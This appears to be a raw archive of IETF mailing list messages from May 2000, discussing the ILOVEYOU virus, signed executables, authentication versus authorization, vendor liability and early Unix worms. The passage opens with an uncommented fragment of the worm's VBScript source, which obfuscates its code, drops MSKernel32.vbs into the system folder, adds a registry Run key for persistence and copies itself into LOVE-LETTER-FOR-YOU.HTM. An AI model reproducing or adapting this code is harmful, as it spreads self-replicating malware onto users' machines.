"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^Curr
entVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
>From owner-ietf-outbound Thu May 4 19:30:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA20932
for [EMAIL PROTECTED]; Thu, 4 May 2000 19:30:02 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA20848
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 19:24:35 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id RAA29122
for [EMAIL PROTECTED] env-from <vjs>;
Thu, 4 May 2000 17:24:35 -0600 (MDT)
Date: Thu, 4 May 2000 17:24:35 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: value of standards
X-Loop: [EMAIL PROTECTED]
] From: Keith Moore <[EMAIL PROTECTED]>
] ...
] You could have senders sign any executables. That might help a little,
] > as long as the sender's machine hasn't been compromised.
]
] this would also help, but we'd need a better way to verify the sender's
] signature than we have now.
It wouldn't help much, unless you are of the religion that believes
authentication implies authorization. Or don't you think that
today's evil doer could have managed to get the latest virus signed
with some company's key? My bet is that many among those websites
that are defaced have handy dandy files of ASCII encoded binary
around near the anonymously improved HTML.
.......
> From: John Stracke <[EMAIL PROTECTED]>
> > Then again, it doesn't say DON'T CUT YOUR CUSTOMER'S ARM OFF either.
>
> Don't be silly; a vendor would never cut a customer's arm off. How would
> they pull out their wallet to pay for the next upgrade?
Don't you be silly either; vendors that think that shipping browsers
with ActiveX turned on from most of the Internet don't want or expect
customers to do anything so "un-user-friendly" as explicitly authorizing
payment. They're happy to infer lack of serous protest as authorization
to debit credit card accounts. They also value the freedom to innovate
missing arms to reduce protests that are not really serious.
(I'd hate to be the marketoon who coined "freedom to innovate." It's
already enshrined as one of the all time Newspeak phrases denoting its
opposite...oh, well, that's probably a badge of honor in some circles.)
.......
> From: Lillian Komlossy <[EMAIL PROTECTED]>
> Let's not make it political. We've all been attacked, it is pointless
> to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac
> are all great as long as somebody likes to work with them.
> I personally like Microsoft products, but I respect those who don't - and
> expect the same respect from them.
You don't get respect for buying what everyone else buys, and you get the
opposite when you buy and use the infamously worst available. (Never mind
that one can't be anything except "political" when demanding "respect.")
At this late date anyone admitting using Outlook without coercion is asking
for contempt from anyone whose respect is worth having. The technical
reasons for that are infamous and too numerous to list here.
.......
} If MS gets split, we could have Office for UNIX sooner rather than
} later too!
There are already packages similar to Office available for many free and
commercial flavors of UNIX. At least one major contender even comes with
something supposedly vaguely like free source. Note that I'm not
recommending those alternatives. Office is fine for simple documents such
as your resume, provided you take precautions with tools outside Office
to ensure that you're not distributing more text, macros, and other stuff
than meets the eye of the casual reader.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 4 20:00:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA21521
for [EMAIL PROTECTED]; Thu, 4 May 2000 20:00:02 -0400 (EDT)
Received: from peace.off.org ([EMAIL PROTECTED] [198.58.4.4])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA21444
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 19:57:15 -0400 (EDT)
Received: (from tex@localhost)
by peace.off.org (8.9.3/8.9.3/SuSE Linux 8.9.3-0.1) id PAA19083;
Thu, 4 May 2000 15:58:50 -0700
Date: Thu, 4 May 2000 15:58:50 -0700
From: Austin Schutz <[EMAIL PROTECTED]>
To: Vernon Schryver <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: value of standards
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre3i
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
On Thu, May 04, 2000 at 05:24:35PM -0600, Vernon Schryver wrote:
> ] From: Keith Moore <[EMAIL PROTECTED]>
>
> ] ...
> ] You could have senders sign any executables. That might help a little,
> ] > as long as the sender's machine hasn't been compromised.
> ]
> ] this would also help, but we'd need a better way to verify the sender's
> ] signature than we have now.
>
> It wouldn't help much, unless you are of the religion that believes
> authentication implies authorization. Or don't you think that
> today's evil doer could have managed to get the latest virus signed
> with some company's key? My bet is that many among those websites
> that are defaced have handy dandy files of ASCII encoded binary
> around near the anonymously improved HTML.
> .......
The point was that an attachment could be signed by the _message
sender_, not the originator of the file. So any executables you send to your
friends would be signed by _you_. Of course, if _your_ machine has been
compromised then your signature is probably no longer valid and the system
breaks.
Your friends would thereby give you the authority to run executables
on their system (with their manual assent, of course) assuming your executable
was properly authenticated as having come from you.
Austin
>From owner-ietf-outbound Thu May 4 20:50:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA22594
for [EMAIL PROTECTED]; Thu, 4 May 2000 20:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA22357
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 20:40:01 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id UAA08387;
Thu, 4 May 2000 20:39:44 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Jon Crowcroft <[EMAIL PROTECTED]>
cc: Scot Mc Pherson <[EMAIL PROTECTED]>, ietf <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 22:28:18 BST."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 20:39:43 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> no class action
perhaps that's not the appropriate mechanism, or perhaps that remedy isn't
available to a large number of those affected.
but sooner or later folks are going to be held liable for poor engineering
or poor implementation of networking software, just like folks today can be
held liable for poor engineering or implementation of bridges or buildings.
when people who design such programs know about these risks, are aware of
adequate countermeasures (e.g. don't make executable content "clickable",
or execute it only in a sandbox), and yet take no action to ameliorate
the risks... how far is that from negligence?
Keith
>From owner-ietf-outbound Thu May 4 21:30:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA23203
for [EMAIL PROTECTED]; Thu, 4 May 2000 21:30:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA23062
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 21:23:53 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id VAA09369;
Thu, 4 May 2000 21:23:46 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Vernon Schryver <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: value of standards
In-reply-to: Your message of "Thu, 04 May 2000 17:24:35 MDT."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 21:23:46 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> ] ...
> ] You could have senders sign any executables. That might help a
> ] little, as long as the sender's machine hasn't been compromised.
> ]
> ] this would also help, but we'd need a better way to verify the sender's
> ] signature than we have now.
>
> It wouldn't help much, unless you are of the religion that believes
> authentication implies authorization. Or don't you think that
> today's evil doer could have managed to get the latest virus signed
> with some company's key?
why in the world would I trust some random company's key?
now, if a "trusted friend" sent me a signed executable -
I as a person might decide that I'm willing to run the executable.
note that there are at least two kinds of trust here -
1. I have to be able to verify my friend's signature against a public
key which is either known to be valid because I've verified it personally,
or because it is signed by someone else that I trust (*maybe* a commercial
CA, definitely *not* a random company)
2. I also have to trust my friend
a) not to be malicious
b) to take reasonable steps to safeguard his system from compromise
(including not running executables from unknown sources)
c) to take reasonable steps to safeguard his private key
(which is not quite the same thing as b).
note that it takes a nontrivial user interface to communicate this to
a recipient of email: e.g.
NOTE: this message was signed by someone purporting to be
Keith Moore <[EMAIL PROTECTED]>. The signature is validated
by a certificate from Fly-By-Night Certificate Authority, Inc.
Fly-By-Night's certificate verifies correctly according to
another certificate from FemtoSoft corporation that was supplied
with your email reader, but you have not personally placed trust
in FemtoSoft.
Therefore the authenticity of the claimed sender cannot be verified.
and yet this is basically what it takes to do the job.
there's no way you should ever just "click" on an arbitrary
attachment regardless of content, expect that content to
be evaluated, and still expect it to not cause harm.
Keith
>From owner-ietf-outbound Thu May 4 22:00:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA24574
for [EMAIL PROTECTED]; Thu, 4 May 2000 22:00:02 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA24518
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 21:55:49 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id 998FC1E019; Thu, 4 May 2000 21:55:50 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id VAA00392;
Thu, 4 May 2000 21:55:44 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 7CAFE35DC2; Thu, 4 May 2000 21:55:43 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
Cc: Vernon Schryver <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: value of standards
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 04 May 2000 21:55:43 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Keith Moore writes:
>
>note that it takes a nontrivial user interface to communicate this to
>a recipient of email: e.g.
>
> NOTE: this message was signed by someone purporting to be
> Keith Moore <[EMAIL PROTECTED]>. The signature is validated
> by a certificate from Fly-By-Night Certificate Authority, Inc.
> Fly-By-Night's certificate verifies correctly according to
> another certificate from FemtoSoft corporation that was supplied
> with your email reader, but you have not personally placed trust
> in FemtoSoft.
>
> Therefore the authenticity of the claimed sender cannot be verified.
>
>and yet this is basically what it takes to do the job.
>
>there's no way you should ever just "click" on an arbitrary
>attachment regardless of content, expect that content to
>be evaluated, and still expect it to not cause harm.
Of course, today's particular piece of malware told users to click 'Yes' to
install the necessary ActiveX control...
As for certifictes -- has anyone else done a Windows 98 update in the last two
weeks, and examined the certificate? It seems that Microsoft's update
certificate expired on 16 April without them noticing... Nor is the first
time this has happened to Microsoft; a year ago, I sent in postings to RISKS
Digest noting that both they and Netscape were shipping updates via expired
certificates. And I'd notified Microsoft about a year before that of yet
another such incident. (I was told that the expiration date didn't matter,
since the certificate was valid at the time the code was signed. Of course,
how am I supposed to know that? Maybe whatever hypothetical being compromised
their expired -- and hence "worthless" -- private key set the date back on his/
her computer before signing a more subtle piece of malicious code.)
--Steve Bellovin
>From owner-ietf-outbound Thu May 4 23:10:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA26402
for [EMAIL PROTECTED]; Thu, 4 May 2000 23:10:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA26352
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 23:04:25 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4534Ph12962;
Thu, 4 May 2000 23:04:25 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
cc: ietf <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 20:39:43 EDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 23:04:24 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 04 May 2000 20:39:43 EDT, Keith Moore said:
> but sooner or later folks are going to be held liable for poor engineering
> or poor implementation of networking software, just like folks today can be
> held liable for poor engineering or implementation of bridges or buildings.
Not if the UCITA becomes legal. Large immoral software vendors can
then ship software shrink-wrapped with a "if you break the seal
you agree to the license inside", and the license inside prohibits
you from reverse-engineering, publicising, or discussing bugs.
I kid you not. Sometimes I wish the Virginia state constitution
was amended so a governor can suceed himself - currently, they're
only in for one consecutive term, so they tend to do splashy-but-longterm
bad things to use it as a springboard for a Congressional campaign...
At least the guys in Richmond had the sense to put a one-year study
period in before it becomes the law...
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 4 23:20:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA26527
for [EMAIL PROTECTED]; Thu, 4 May 2000 23:20:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA26379
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 23:08:41 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4538dh12992;
Thu, 4 May 2000 23:08:39 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Vernon Schryver <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: value of standards
In-reply-to: Your message of "Thu, 04 May 2000 17:24:35 MDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 23:08:39 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 04 May 2000 17:24:35 MDT, Vernon Schryver <[EMAIL PROTECTED]> said:
> It wouldn't help much, unless you are of the religion that believes
> authentication implies authorization. Or don't you think that
Unfortunately, some people are as neuron-paralized by this religion
as by many others. The example I've finally taken to using to
explain the difference is as follows:
"Hmm.. you have 3 different ID's that say you're Jeffrey Dahmer(*).
I guess it IS ok to lend you a steak knife...."
That usually gets their attention...
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
(*) Yes, I know he's dead. If that ruins the example for you,
use Hannibal Lecter instead...
>From owner-ietf-outbound Thu May 4 23:30:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA26666
for [EMAIL PROTECTED]; Thu, 4 May 2000 23:30:03 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA26425
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 23:10:56 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e453Auh44866;
Thu, 4 May 2000 23:10:56 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: value of standards
In-reply-to: Your message of "Thu, 04 May 2000 15:25:37 EDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 23:10:52 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 04 May 2000 15:25:37 EDT, Keith Moore said:
> Perhaps unfortunately, RFC 2046 doesn't come right out and say
> "DON'T EXECUTE CONTENT IN EMAIL MESSAGES".
>
> Then again, it doesn't say DON'T CUT YOUR CUSTOMER'S ARM OFF either.
>
> not that it would matter if it did...
There's simple inability to correctly implement the protocol,
and there's unwillingness to correctly implement the protocol.
I'm still not sure which is more easily curable with a baseball bat... ;)
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 4 23:40:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA27230
for [EMAIL PROTECTED]; Thu, 4 May 2000 23:40:03 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA26446
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 23:13:07 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e453D3h37608;
Thu, 4 May 2000 23:13:03 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Scot Mc Pherson <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 11:11:50 EDT."
<00e101bfb5db$13959a60$[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <00e101bfb5db$13959a60$[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 23:13:03 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson <[EMAIL PROTECTED]> said:
> In fact to back up your statement, there are exactly 3 virii that infect
> UNIX based systems.
Hmm.. the Morris worm of 1988. What are the other 2?
Hmm.. if you count the 2 self-reproducing sample programs that
came with 'gcc', no others. Or maybe there's more than 3, which
is likely since I've seen at least 4 different "proof of concept"
level creations...
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 4 23:50:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA27482
for [EMAIL PROTECTED]; Thu, 4 May 2000 23:50:03 -0400 (EDT)
Received: from piglet.dstc.edu.au (piglet.dstc.edu.au [130.102.176.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA27443
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 23:48:52 -0400 (EDT)
Received: from dstc.edu.au (asuncion.dstc.edu.au [130.102.176.155])
by piglet.dstc.edu.au (8.10.1/8.10.1) with ESMTP id e453mWT29322;
Fri, 5 May 2000 13:48:32 +1000 (EST)
X-Mailer: exmh version 2.1.0 09/18/1999
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: Message from [EMAIL PROTECTED]
of "Thu, 04 May 2000 23:13:03 -0400."
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 05 May 2000 13:48:33 +1000
Message-ID: <[EMAIL PROTECTED]>
From: George Michaelson <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Hmm.. the Morris worm of 1988. What are the other 2?
Piers Dick Lauder and Bob Kummerfeld implemented Mail/sendfile *@*
(yes, wildcards both sides of the user@host name form) in ACSnet prior
to this. It was designed to be used amongst other things, to do s/w updates
to all ACSnet subscribers. And it worked over IP as well as an applications
layer over TCP/IP, gated into sendmail.
The one time I saw them use it, it killed my sendmail by n->n*m explosion
of outbound mails. And as soon as I deleted one from mqueue, another 20
came in.
Mike Lesk claimed UUCP was invented for similar reasons and I seem to recall
some more than proof of concept uux methods to re-create forwarding data but
thats probably never been exploited in an IP network.
Then there are the checkgroups message flows in News...
cheers
-George
--
George Michaelson | DSTC Pty Ltd
Email: [EMAIL PROTECTED] | University of Qld 4072
Phone: +61 7 3365 4310 | Australia
Fax: +61 7 3365 4311 | http://www.dstc.edu.au
>From owner-ietf-outbound Fri May 5 09:00:44 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA17475
for [EMAIL PROTECTED]; Fri, 5 May 2000 09:00:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA17281
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 08:53:49 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id HAA10764;
Fri, 5 May 2000 07:53:35 -0400
Date: Fri, 5 May 2000 07:53:35 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: Scot Mc Pherson <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Message-ID: <[EMAIL PROTECTED]>
References: <00e101bfb5db$13959a60$[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <[EMAIL PROTECTED]>; from
[EMAIL PROTECTED] on Thu, May 04, 2000 at 11:13:03PM -0400
X-Loop: [EMAIL PROTECTED]
On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote:
> On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson <[EMAIL PROTECTED]> said:
> > In fact to back up your statement, there are exactly 3 virii that infect
> > UNIX based systems.
> Hmm.. the Morris worm of 1988. What are the other 2?
Bliss? Wasn't very sophisticated and it didn't propagate very
well, but it did work. It just fizzeled out because it's propagation
coefficient never even came close to break even.
What's the other one?
> Hmm.. if you count the 2 self-reproducing sample programs that
> came with 'gcc', no others. Or maybe there's more than 3, which
> is likely since I've seen at least 4 different "proof of concept"
> level creations...
I've seen some assembly code someone was proposing on one of the
development lists. One of the DOS virus writers claiming that it would
work as a Linux virus. No evidence that it does anything though. I
would marginally call that one a "proof of concept" or a "maybe of
concept".
> Valdis Kletnieks
> Operating Systems Analyst
> Virginia Tech
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Fri May 5 09:50:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA18890
for [EMAIL PROTECTED]; Fri, 5 May 2000 09:50:03 -0400 (EDT)
Received: from prue.eim.surrey.ac.uk (IDENT:[EMAIL PROTECTED] [131.227.76.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA18781
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 09:46:00 -0400 (EDT)
Received: from petra.ee.surrey.ac.uk ([131.227.88.13] ident=eep1lw)
by prue.eim.surrey.ac.uk with esmtp (Exim 3.03 #1)
id 12niQR-0002L8-00; Fri, 05 May 2000 14:45:51 +0100
Date: Fri, 5 May 2000 14:45:49 +0100 (BST)
From: Lloyd Wood <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: Jon Crowcroft <[EMAIL PROTECTED]>
cc: Scot Mc Pherson <[EMAIL PROTECTED]>, ietf <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Organization: speaking for none
X-url: http://www.ee.surrey.ac.uk/Personal/L.Wood/
X-no-archive: yes
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Thu, 4 May 2000, Jon Crowcroft wrote:
> for a systemic view,
> some stuff is engineered better than other stuff - see mark handly's
> excellent letter to the new york times, post melissa
Handl*e*y. Jon's referring to what was sent, not what bits scraped
through, ah, peer review. As detailed on
http://www.aciri.org/mjh/
L.
references R us.
<[EMAIL PROTECTED]>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>
>From owner-ietf-outbound Fri May 5 10:00:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA19251
for [EMAIL PROTECTED]; Fri, 5 May 2000 10:00:04 -0400 (EDT)
Received: from sentry.gw.tislabs.com ([EMAIL PROTECTED]
[192.94.214.100])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA18964
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 09:51:23 -0400 (EDT)
Received: by sentry.gw.tislabs.com; id JAA28059; Fri, 5 May 2000 09:53:13 -0400 (EDT)
Received: from clipper.gw.tislabs.com(10.33.1.2) by sentry.gw.tislabs.com via smap
(V5.5)
id xma028054; Fri, 5 May 00 09:52:26 -0400
Received: (from balenson@localhost)
by clipper.gw.tislabs.com (8.9.3/8.9.1) id JAA28932
for [EMAIL PROTECTED]; Fri, 5 May 2000 09:46:18 -0400 (EDT)
Date: Fri, 5 May 2000 09:46:18 -0400 (EDT)
